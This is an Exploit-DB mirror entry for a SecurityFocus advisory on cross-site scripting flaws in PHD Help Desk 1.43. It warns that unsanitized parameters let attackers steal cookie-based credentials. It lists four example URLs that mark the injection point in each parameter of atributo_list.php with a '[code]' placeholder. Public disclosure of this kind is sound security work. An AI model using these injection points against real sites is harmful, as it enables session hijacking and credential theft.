exploit-db-mirror/platforms/php/webapps/33358.txt
Offensive Security 4d927f6c33 Updated 05_16_2014
2014-05-16 04:36:04 +00:00

12 lines
No EOL
871 B
Text
Executable file

source: http://www.securityfocus.com/bid/37029/info
PHD Help Desk is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
PHD Help Desk 1.43 is vulnerable; other versions may also be affected.
http://www.example.com/atributo_list.php?pagina=1[code]&q_registros=15&orden=activo&sentido
http://www.example.com/atributo_list.php?pagina=1&q_registros=15[code]&orden=activo&sentido
http://www.example.com/atributo_list.php?pagina=1&q_registros=15&orden=activo[code]&sentido
http://www.example.com/atributo_list.php?pagina=1&q_registros=15&orden=activo&sentido[code]